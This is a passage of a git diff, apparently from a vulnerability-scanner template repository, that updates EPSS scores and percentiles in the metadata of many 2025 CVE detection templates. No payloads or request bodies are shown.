epss-percentile: 0.99402 + epss-score: 0.81958 + epss-percentile: 0.99168 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-30406 diff --git a/http/cves/2025/CVE-2025-30567.yaml b/http/cves/2025/CVE-2025-30567.yaml index 070623ad26b..bf501b167f3 100644 --- a/http/cves/2025/CVE-2025-30567.yaml +++ b/http/cves/2025/CVE-2025-30567.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-30567 cwe-id: CWE-22 epss-score: 0.30947 - epss-percentile: 0.96591 + epss-percentile: 0.96593 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-31131.yaml b/http/cves/2025/CVE-2025-31131.yaml index d7c707ecb45..9f4ee34421c 100644 --- a/http/cves/2025/CVE-2025-31131.yaml +++ b/http/cves/2025/CVE-2025-31131.yaml @@ -16,7 +16,7 @@ info: - https://github.com/YesWiki/yeswiki/security/advisories/GHSA-w34w-fvp3-68xm classification: epss-score: 0.0842 - epss-percentile: 0.92063 + epss-percentile: 0.92058 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cve-id: CVE-2025-31131 diff --git a/http/cves/2025/CVE-2025-31324.yaml b/http/cves/2025/CVE-2025-31324.yaml index f4035190bc4..60e25d4bf74 100644 --- a/http/cves/2025/CVE-2025-31324.yaml +++ b/http/cves/2025/CVE-2025-31324.yaml @@ -20,8 +20,8 @@ info: cvss-score: 10 cve-id: CVE-2025-31324 cwe-id: CWE-434 - epss-score: 0.34669 - epss-percentile: 0.96879 + epss-score: 0.36897 + epss-percentile: 0.97021 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-31486.yaml b/http/cves/2025/CVE-2025-31486.yaml index 6b4fe213172..700c3634412 100644 --- a/http/cves/2025/CVE-2025-31486.yaml +++ b/http/cves/2025/CVE-2025-31486.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2025-31486 cwe-id: CWE-200 epss-score: 0.02592 - epss-percentile: 0.85196 + epss-percentile: 0.85191 metadata: verified: true max-requests: 1 diff --git a/http/cves/2025/CVE-2025-31489.yaml b/http/cves/2025/CVE-2025-31489.yaml index ffe54908466..527eeea192d 100644 --- a/http/cves/2025/CVE-2025-31489.yaml +++ b/http/cves/2025/CVE-2025-31489.yaml @@ -16,7 +16,7 @@ info: - https://github.com/minio/minio/security/advisories/GHSA-wg47-6jq2-q2hh classification: epss-score: 0.02925 - epss-percentile: 0.86011 + epss-percentile: 0.8601 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-32429.yaml b/http/cves/2025/CVE-2025-32429.yaml index f48a1dd1dde..aebc1eecd78 100644 --- a/http/cves/2025/CVE-2025-32429.yaml +++ b/http/cves/2025/CVE-2025-32429.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-32429 epss-score: 0.29579 - epss-percentile: 0.96474 + epss-percentile: 0.96477 cwe-id: CWE-89 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-32430.yaml b/http/cves/2025/CVE-2025-32430.yaml index 44be6625ac9..a0c0c40f490 100644 --- a/http/cves/2025/CVE-2025-32430.yaml +++ b/http/cves/2025/CVE-2025-32430.yaml @@ -19,7 +19,7 @@ info: cvss-score: 6.5 cve-id: CVE-2025-32430 epss-score: 0.00116 - epss-percentile: 0.31092 + epss-percentile: 0.31035 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-32432.yaml b/http/cves/2025/CVE-2025-32432.yaml index 400c3a189f8..5a2b7ae55d4 100644 --- a/http/cves/2025/CVE-2025-32432.yaml +++ b/http/cves/2025/CVE-2025-32432.yaml @@ -21,8 +21,8 @@ info: cvss-score: 10 cve-id: CVE-2025-32432 cwe-id: CWE-94 - epss-score: 0.75241 - epss-percentile: 0.98835 + epss-score: 0.75549 + epss-percentile: 0.98852 metadata: max-request: 2 vendor: craftcms diff --git a/http/cves/2025/CVE-2025-3248.yaml b/http/cves/2025/CVE-2025-3248.yaml index 5c3bb4b3005..641bf16b2d1 100644 --- a/http/cves/2025/CVE-2025-3248.yaml +++ b/http/cves/2025/CVE-2025-3248.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-3248 cwe-id: CWE-306 - epss-score: 0.91417 - epss-percentile: 0.99641 + epss-score: 0.91973 + epss-percentile: 0.99682 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-32813.yaml b/http/cves/2025/CVE-2025-32813.yaml index 66067530de3..1ffa85a29e9 100644 --- a/http/cves/2025/CVE-2025-32813.yaml +++ b/http/cves/2025/CVE-2025-32813.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-32813 cwe-id: CWE-77 epss-score: 0.03757 - epss-percentile: 0.87693 + epss-percentile: 0.87694 cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-32814.yaml b/http/cves/2025/CVE-2025-32814.yaml index b1fcbdf3b1c..2e924905a81 100644 --- a/http/cves/2025/CVE-2025-32814.yaml +++ b/http/cves/2025/CVE-2025-32814.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-32814 cwe-id: CWE-89 epss-score: 0.19591 - epss-percentile: 0.95223 + epss-percentile: 0.95221 cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-32815.yaml b/http/cves/2025/CVE-2025-32815.yaml index e3e059ef43f..1f386cb5a89 100644 --- a/http/cves/2025/CVE-2025-32815.yaml +++ b/http/cves/2025/CVE-2025-32815.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-32815 cwe-id: CWE-287 epss-score: 0.22773 - epss-percentile: 0.95691 + epss-percentile: 0.95698 cpe: cpe:2.3:a:infoblox:netmri:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-32969.yaml b/http/cves/2025/CVE-2025-32969.yaml index 828d06e6cda..79d284186a4 100644 --- a/http/cves/2025/CVE-2025-32969.yaml +++ b/http/cves/2025/CVE-2025-32969.yaml @@ -16,7 +16,7 @@ info: classification: cve-id: CVE-2025-32969 epss-score: 0.25201 - epss-percentile: 0.96012 + epss-percentile: 0.96016 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cwe-id: CWE-89 diff --git a/http/cves/2025/CVE-2025-34023.yaml b/http/cves/2025/CVE-2025-34023.yaml index ae810aa7466..1ffca184741 100644 --- a/http/cves/2025/CVE-2025-34023.yaml +++ b/http/cves/2025/CVE-2025-34023.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-34023 epss-score: 0.01848 - epss-percentile: 0.82545 + epss-percentile: 0.82542 cwe-id: CWE-22 metadata: max-request: 1 diff --git a/http/cves/2025/CVE-2025-34026.yaml b/http/cves/2025/CVE-2025-34026.yaml index d1e5fa26b6e..a22cb256f22 100644 --- a/http/cves/2025/CVE-2025-34026.yaml +++ b/http/cves/2025/CVE-2025-34026.yaml @@ -16,7 +16,7 @@ info: - https://www.cve.org/CVERecord?id=CVE-2025-34026 classification: epss-score: 0.07882 - epss-percentile: 0.91758 + epss-percentile: 0.91755 cpe: cpe:2.3:a:versa-networks:concerto:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-34028.yaml b/http/cves/2025/CVE-2025-34028.yaml index 1253fcea200..f7084037c75 100644 --- a/http/cves/2025/CVE-2025-34028.yaml +++ b/http/cves/2025/CVE-2025-34028.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2025-34028 cwe-id: CWE-22 - epss-score: 0.45932 - epss-percentile: 0.97523 + epss-score: 0.45091 + epss-percentile: 0.9748 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-34031.yaml b/http/cves/2025/CVE-2025-34031.yaml index 947116b02a1..8f8babcd4f5 100644 --- a/http/cves/2025/CVE-2025-34031.yaml +++ b/http/cves/2025/CVE-2025-34031.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-34031 classification: epss-score: 0.14521 - epss-percentile: 0.94243 + epss-percentile: 0.9424 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N cve-id: CVE-2025-34031 cvss-score: 7.5 diff --git a/http/cves/2025/CVE-2025-34032.yaml b/http/cves/2025/CVE-2025-34032.yaml index 7361f6c786a..f27cd6c40c2 100644 --- a/http/cves/2025/CVE-2025-34032.yaml +++ b/http/cves/2025/CVE-2025-34032.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-34032 classification: epss-score: 0.00115 - epss-percentile: 0.30823 + epss-percentile: 0.30765 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cve-id: CVE-2025-34032 cvss-score: 5.4 diff --git a/http/cves/2025/CVE-2025-34035.yaml b/http/cves/2025/CVE-2025-34035.yaml index be2c5eb1105..d72ae6e1cd5 100644 --- a/http/cves/2025/CVE-2025-34035.yaml +++ b/http/cves/2025/CVE-2025-34035.yaml @@ -20,7 +20,7 @@ info: cvss-score: 10.0 cve-id: CVE-2025-34035 epss-score: 0.07633 - epss-percentile: 0.91607 + epss-percentile: 0.91606 cwe-id: CWE-78 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-34077.yaml b/http/cves/2025/CVE-2025-34077.yaml index 29c8c28d635..dfd16857011 100644 --- a/http/cves/2025/CVE-2025-34077.yaml +++ b/http/cves/2025/CVE-2025-34077.yaml @@ -16,7 +16,7 @@ info: - https://securityvulnerability.io/vulnerability/CVE-2025-34077 classification: epss-score: 0.71207 - epss-percentile: 0.98665 + epss-percentile: 0.98664 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-34141.yaml b/http/cves/2025/CVE-2025-34141.yaml index 436672fdca5..87427850707 100644 --- a/http/cves/2025/CVE-2025-34141.yaml +++ b/http/cves/2025/CVE-2025-34141.yaml @@ -15,7 +15,7 @@ info: - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/ classification: epss-score: 0.01133 - epss-percentile: 0.77905 + epss-percentile: 0.77901 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-34141 diff --git a/http/cves/2025/CVE-2025-34143.yaml b/http/cves/2025/CVE-2025-34143.yaml index 7aa66d39cf1..88b18b9db6f 100644 --- a/http/cves/2025/CVE-2025-34143.yaml +++ b/http/cves/2025/CVE-2025-34143.yaml @@ -15,7 +15,7 @@ info: - https://slcyber.io/assetnote-security-research-center/how-we-accidentally-discovered-a-remote-code-execution-vulnerability-in-etq-reliance/ classification: epss-score: 0.03096 - epss-percentile: 0.86409 + epss-percentile: 0.86411 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-34143 diff --git a/http/cves/2025/CVE-2025-3415.yaml b/http/cves/2025/CVE-2025-3415.yaml index 8e35fa543ad..30020b101a7 100644 --- a/http/cves/2025/CVE-2025-3415.yaml +++ b/http/cves/2025/CVE-2025-3415.yaml @@ -14,7 +14,7 @@ info: - https://grafana.com/blog/2025/06/13/grafana-security-update-medium-severity-security-release-for-cve-2025-3415/ classification: epss-score: 0.0033 - epss-percentile: 0.55448 + epss-percentile: 0.5544 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-34291.yaml b/http/cves/2025/CVE-2025-34291.yaml index 818ddafc3b8..b2a1d65b518 100644 --- a/http/cves/2025/CVE-2025-34291.yaml +++ b/http/cves/2025/CVE-2025-34291.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.4 cve-id: CVE-2025-34291 - epss-score: 0.14647 - epss-percentile: 0.94271 + epss-score: 0.16928 + epss-percentile: 0.94754 cwe-id: CWE-942 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-34299.yaml b/http/cves/2025/CVE-2025-34299.yaml index dc2f7563e20..a0bcfa0ca50 100644 --- a/http/cves/2025/CVE-2025-34299.yaml +++ b/http/cves/2025/CVE-2025-34299.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-34299 epss-score: 0.68437 - epss-percentile: 0.98552 + epss-percentile: 0.98553 cwe-id: CWE-434 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-34509.yaml b/http/cves/2025/CVE-2025-34509.yaml index 8d30e0dc1b6..d73f73ca33b 100644 --- a/http/cves/2025/CVE-2025-34509.yaml +++ b/http/cves/2025/CVE-2025-34509.yaml @@ -19,7 +19,7 @@ info: cvss-score: 8.2 cve-id: CVE-2025-34509 epss-score: 0.14459 - epss-percentile: 0.94231 + epss-percentile: 0.94228 cwe-id: CWE-798 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:*,cpe:2.3:a:sitecore:experience_platform:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-3472.yaml b/http/cves/2025/CVE-2025-3472.yaml index 3da7ba7fcaa..9369e73fdfe 100644 --- a/http/cves/2025/CVE-2025-3472.yaml +++ b/http/cves/2025/CVE-2025-3472.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-3472 cwe-id: CWE-94 epss-score: 0.0064 - epss-percentile: 0.70009 + epss-percentile: 0.69989 metadata: verified: true max-request: 3 diff --git a/http/cves/2025/CVE-2025-3605.yaml b/http/cves/2025/CVE-2025-3605.yaml index c4eeff3c310..cec7e142c18 100644 --- a/http/cves/2025/CVE-2025-3605.yaml +++ b/http/cves/2025/CVE-2025-3605.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-3605 cwe-id: CWE-639 - epss-score: 0.19545 - epss-percentile: 0.95215 + epss-score: 0.15371 + epss-percentile: 0.94424 cpe: cpe:2.3:a:wordpress:frontend_login_and_registration_blocks:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-36604.yaml b/http/cves/2025/CVE-2025-36604.yaml index 911431f4aa2..345c80e7bf4 100644 --- a/http/cves/2025/CVE-2025-36604.yaml +++ b/http/cves/2025/CVE-2025-36604.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2025-36604 epss-score: 0.16774 - epss-percentile: 0.94738 + epss-percentile: 0.94735 cwe-id: CWE-78 cpe: cpe:2.3:a:dell:unity_operating_environment:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-4008.yaml b/http/cves/2025/CVE-2025-4008.yaml index e8fdd370cda..1d9302bac9d 100644 --- a/http/cves/2025/CVE-2025-4008.yaml +++ b/http/cves/2025/CVE-2025-4008.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cwe-id: CWE-77 epss-score: 0.49413 - epss-percentile: 0.97699 + epss-percentile: 0.97693 metadata: verified: true shodan-query: "meteobridge" diff --git a/http/cves/2025/CVE-2025-4009.yaml b/http/cves/2025/CVE-2025-4009.yaml index 8246961a5a0..bdf701bbcb4 100644 --- a/http/cves/2025/CVE-2025-4009.yaml +++ b/http/cves/2025/CVE-2025-4009.yaml @@ -16,7 +16,7 @@ info: cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/S:N/AU:Y/V:C cvss-score: 9.3 epss-score: 0.05406 - epss-percentile: 0.89851 + epss-percentile: 0.89847 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-40630.yaml b/http/cves/2025/CVE-2025-40630.yaml index 14a9b0844df..b48b0ac41b0 100644 --- a/http/cves/2025/CVE-2025-40630.yaml +++ b/http/cves/2025/CVE-2025-40630.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-40630 cwe-id: CWE-601 epss-score: 0.00414 - epss-percentile: 0.61077 + epss-percentile: 0.61073 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-4123.yaml b/http/cves/2025/CVE-2025-4123.yaml index becad358e2f..9e189250cff 100644 --- a/http/cves/2025/CVE-2025-4123.yaml +++ b/http/cves/2025/CVE-2025-4123.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2025-4123 cwe-id: CWE-79,CWE-601 epss-score: 0.08682 - epss-percentile: 0.92213 + epss-percentile: 0.92206 reference: - https://medium.com/@Nightbloodz/grafana-cve-2025-4123-full-read-ssrf-account-takeover-d12abd13cd53 - https://grafana.com/blog/2025/05/21/grafana-security-release-high-severity-security-fix-for-cve-2025-4123/ diff --git a/http/cves/2025/CVE-2025-41393.yaml b/http/cves/2025/CVE-2025-41393.yaml index 8757f9221e2..0d77a7706d9 100644 --- a/http/cves/2025/CVE-2025-41393.yaml +++ b/http/cves/2025/CVE-2025-41393.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-41393 classification: epss-score: 0.00621 - epss-percentile: 0.69516 + epss-percentile: 0.69503 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cwe-id: CWE-79 diff --git a/http/cves/2025/CVE-2025-41646.yaml b/http/cves/2025/CVE-2025-41646.yaml index 641b35b46e9..fc1d96991a6 100644 --- a/http/cves/2025/CVE-2025-41646.yaml +++ b/http/cves/2025/CVE-2025-41646.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2025-41646 cwe-id: CWE-704 epss-score: 0.16049 - epss-percentile: 0.9457 + epss-percentile: 0.94568 cpe: cpe:2.3:a:kunbus:revpi_status:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2025/CVE-2025-4210.yaml b/http/cves/2025/CVE-2025-4210.yaml index a362bc3490a..5a229b4d28e 100644 --- a/http/cves/2025/CVE-2025-4210.yaml +++ b/http/cves/2025/CVE-2025-4210.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2025-4210 - epss-score: 0.02974 - epss-percentile: 0.86108 + epss-score: 0.01545 + epss-percentile: 0.80976 cwe-id: CWE-285 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-4302.yaml b/http/cves/2025/CVE-2025-4302.yaml index 26e65512d34..a290662b49b 100644 --- a/http/cves/2025/CVE-2025-4302.yaml +++ b/http/cves/2025/CVE-2025-4302.yaml @@ -19,7 +19,7 @@ info: cvss-score: 5.3 cve-id: CVE-2025-4302 epss-score: 0.00933 - epss-percentile: 0.75666 + epss-percentile: 0.75659 metadata: verified: true vendor: fullworks diff --git a/http/cves/2025/CVE-2025-4380.yaml b/http/cves/2025/CVE-2025-4380.yaml index e3c22bbb79c..ade4df2f29e 100644 --- a/http/cves/2025/CVE-2025-4380.yaml +++ b/http/cves/2025/CVE-2025-4380.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-4380 classification: epss-score: 0.16513 - epss-percentile: 0.9469 + epss-percentile: 0.94688 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-4380 diff --git a/http/cves/2025/CVE-2025-4388.yaml b/http/cves/2025/CVE-2025-4388.yaml index 9aa8f96e1b2..0ff63abcfed 100644 --- a/http/cves/2025/CVE-2025-4388.yaml +++ b/http/cves/2025/CVE-2025-4388.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-4388 cwe-id: CWE-79 epss-score: 0.13137 - epss-percentile: 0.93903 + epss-percentile: 0.93898 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-4396.yaml b/http/cves/2025/CVE-2025-4396.yaml index d46875826bf..ededc45b7f2 100644 --- a/http/cves/2025/CVE-2025-4396.yaml +++ b/http/cves/2025/CVE-2025-4396.yaml @@ -18,7 +18,7 @@ info: - https://plugins.trac.wordpress.org/browser/relevanssi/tags/4.24.4/lib/search.php#L982 classification: epss-score: 0.21054 - epss-percentile: 0.95468 + epss-percentile: 0.95469 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2025-4396 diff --git a/http/cves/2025/CVE-2025-44136.yaml b/http/cves/2025/CVE-2025-44136.yaml index 1fbab669e4b..2613fa5ec24 100644 --- a/http/cves/2025/CVE-2025-44136.yaml +++ b/http/cves/2025/CVE-2025-44136.yaml @@ -18,7 +18,7 @@ info: cvss-score: 6.1 cve-id: CVE-2025-44136 epss-score: 0.10019 - epss-percentile: 0.92841 + epss-percentile: 0.92834 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-44137.yaml b/http/cves/2025/CVE-2025-44137.yaml index cdf67e203ca..433a2190ae3 100644 --- a/http/cves/2025/CVE-2025-44137.yaml +++ b/http/cves/2025/CVE-2025-44137.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2025-44137 epss-score: 0.00364 - epss-percentile: 0.57898 + epss-percentile: 0.57892 cwe-id: CWE-22 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-44148.yaml b/http/cves/2025/CVE-2025-44148.yaml index de2e4edda2a..70ebcd7b395 100644 --- a/http/cves/2025/CVE-2025-44148.yaml +++ b/http/cves/2025/CVE-2025-44148.yaml @@ -15,7 +15,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-44148 classification: epss-score: 0.10898 - epss-percentile: 0.93167 + epss-percentile: 0.93161 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2025-44148 diff --git a/http/cves/2025/CVE-2025-44177.yaml b/http/cves/2025/CVE-2025-44177.yaml index 804bac28d9d..db66059d168 100644 --- a/http/cves/2025/CVE-2025-44177.yaml +++ b/http/cves/2025/CVE-2025-44177.yaml @@ -20,7 +20,7 @@ info: cvss-score: 8.2 cve-id: CVE-2025-44177 epss-score: 0.05816 - epss-percentile: 0.90238 + epss-percentile: 0.9024 cwe-id: CWE-22 cpe: cpe:2.3:a:wss:protop:4.4.2-2024-11-27:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2025/CVE-2025-4427.yaml b/http/cves/2025/CVE-2025-4427.yaml index 64477842a5c..e23607a370e 100644 --- a/http/cves/2025/CVE-2025-4427.yaml +++ b/http/cves/2025/CVE-2025-4427.yaml @@ -17,8 +17,8 @@ info: cvss-score: 5.3 cve-id: CVE-2025-4427 cwe-id: CWE-288 - epss-score: 0.91401 - epss-percentile: 0.99641 + epss-score: 0.9146 + epss-percentile: 0.99645 metadata: verified: true max-request: 2 diff --git a/http/cves/2025/CVE-2025-45854.yaml b/http/cves/2025/CVE-2025-45854.yaml index 731e32caca3..f9cf7e9eb60 100644 --- a/http/cves/2025/CVE-2025-45854.yaml +++ b/http/cves/2025/CVE-2025-45854.yaml @@ -14,8 +14,8 @@ info: - https://gist.github.com/Cafe-Tea/bc14b38f4bfd951de2979a24c3358460 - https://nvd.nist.gov/vuln/detail/CVE-2025-45854 classification: - epss-score: 0.13089 - epss-percentile: 0.93891 + epss-score: 0.16794 + epss-percentile: 0.94738 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 10 cve-id: CVE-2025-45854 diff --git a/http/cves/2025/CVE-2025-45985.yaml b/http/cves/2025/CVE-2025-45985.yaml index 464974205d3..e0b3e419613 100644 --- a/http/cves/2025/CVE-2025-45985.yaml +++ b/http/cves/2025/CVE-2025-45985.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-45985 cwe-id: CWE-77 - epss-score: 0.33584 - epss-percentile: 0.968 + epss-score: 0.24487 + epss-percentile: 0.95944 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-4632.yaml b/http/cves/2025/CVE-2025-4632.yaml index 3293307c133..552e85bacbc 100644 --- a/http/cves/2025/CVE-2025-4632.yaml +++ b/http/cves/2025/CVE-2025-4632.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-4632 cwe-id: CWE-22 - epss-score: 0.41169 - epss-percentile: 0.97268 + epss-score: 0.42679 + epss-percentile: 0.97355 cpe: cpe:2.3:a:samsung:magicinfo_9_server:*:*:*:*:*:*:*:* metadata: vendor: samsung diff --git a/http/cves/2025/CVE-2025-46349.yaml b/http/cves/2025/CVE-2025-46349.yaml index c551f85853d..468d04400a4 100644 --- a/http/cves/2025/CVE-2025-46349.yaml +++ b/http/cves/2025/CVE-2025-46349.yaml @@ -15,8 +15,8 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-46349 classification: cve-id: CVE-2025-46349 - epss-score: 0.00708 - epss-percentile: 0.71708 + epss-score: 0.00418 + epss-percentile: 0.61307 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 metadata: diff --git a/http/cves/2025/CVE-2025-46550.yaml b/http/cves/2025/CVE-2025-46550.yaml index f3bef7f1835..d0fc8862616 100644 --- a/http/cves/2025/CVE-2025-46550.yaml +++ b/http/cves/2025/CVE-2025-46550.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2025-46550 - epss-score: 0.00378 - epss-percentile: 0.58795 + epss-score: 0.00266 + epss-percentile: 0.49832 cwe-id: CWE-79 metadata: verified: true diff --git a/http/cves/2025/CVE-2025-46822.yaml b/http/cves/2025/CVE-2025-46822.yaml index a85e4307b07..24f7abd61a7 100644 --- a/http/cves/2025/CVE-2025-46822.yaml +++ b/http/cves/2025/CVE-2025-46822.yaml @@ -18,7 +18,7 @@ info: - https://github.com/PuddinCat/GithubRepoSpider classification: epss-score: 0.11483 - epss-percentile: 0.93401 + epss-percentile: 0.93395 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-47204.yaml b/http/cves/2025/CVE-2025-47204.yaml index 3e21564dbea..eb329698c3c 100644 --- a/http/cves/2025/CVE-2025-47204.yaml +++ b/http/cves/2025/CVE-2025-47204.yaml @@ -14,7 +14,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-47204 classification: epss-score: 0.00762 - epss-percentile: 0.72858 + epss-percentile: 0.72838 metadata: verified: true max-request: 1 diff --git a/http/cves/2025/CVE-2025-47423.yaml b/http/cves/2025/CVE-2025-47423.yaml index f3d46857989..18d909dd536 100644 --- a/http/cves/2025/CVE-2025-47423.yaml +++ b/http/cves/2025/CVE-2025-47423.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2025-47423 cwe-id: CWE-24 epss-score: 0.01034 - epss-percentile: 0.76908 + epss-percentile: 0.76899 metadata: fofa-query: title="PWS Dashboard" max-request: 2 diff --git a/http/cves/2025/CVE-2025-47539.yaml b/http/cves/2025/CVE-2025-47539.yaml index 8ada02ca5fa..8811e479f2a 100644 --- a/http/cves/2025/CVE-2025-47539.yaml +++ b/http/cves/2025/CVE-2025-47539.yaml @@ -16,7 +16,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2025-47539 classification: epss-score: 0.27152 - epss-percentile: 0.96229 + epss-percentile: 0.96232 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-47539 diff --git a/http/cves/2025/CVE-2025-47646.yaml b/http/cves/2025/CVE-2025-47646.yaml index cfab62f6da0..1fc29b11d49 100644 --- a/http/cves/2025/CVE-2025-47646.yaml +++ b/http/cves/2025/CVE-2025-47646.yaml @@ -21,8 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2025-47646 cwe-id: CWE-640 - epss-score: 0.05125 - epss-percentile: 0.89543 + epss-score: 0.08847 + epss-percentile: 0.9229 tags: cve,cve2025,wordpress,wp-plugin,psw,intrusive,vuln variables: diff --git a/http/cves/2025/CVE-2025-47812.yaml b/http/cves/2025/CVE-2025-47812.yaml index 8e9d9d25f19..b3b0fca5e48 100644 --- a/http/cves/2025/CVE-2025-47812.yaml +++ b/http/cves/2025/CVE-2025-47812.yaml @@ -20,8 +20,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-47812 - epss-score: 0.924 - epss-percentile: 0.99714 + epss-score: 0.92465 + epss-percentile: 0.99719 metadata: verified: true product: wftpserver diff --git a/http/cves/2025/CVE-2025-47813.yaml b/http/cves/2025/CVE-2025-47813.yaml index bbe434b00fa..ac2c73b9777 100644 --- a/http/cves/2025/CVE-2025-47813.yaml +++ b/http/cves/2025/CVE-2025-47813.yaml @@ -18,7 +18,7 @@ info: - https://www.wftpserver.com classification: epss-score: 0.00622 - epss-percentile: 0.69532 + epss-percentile: 0.69519 cve-id: 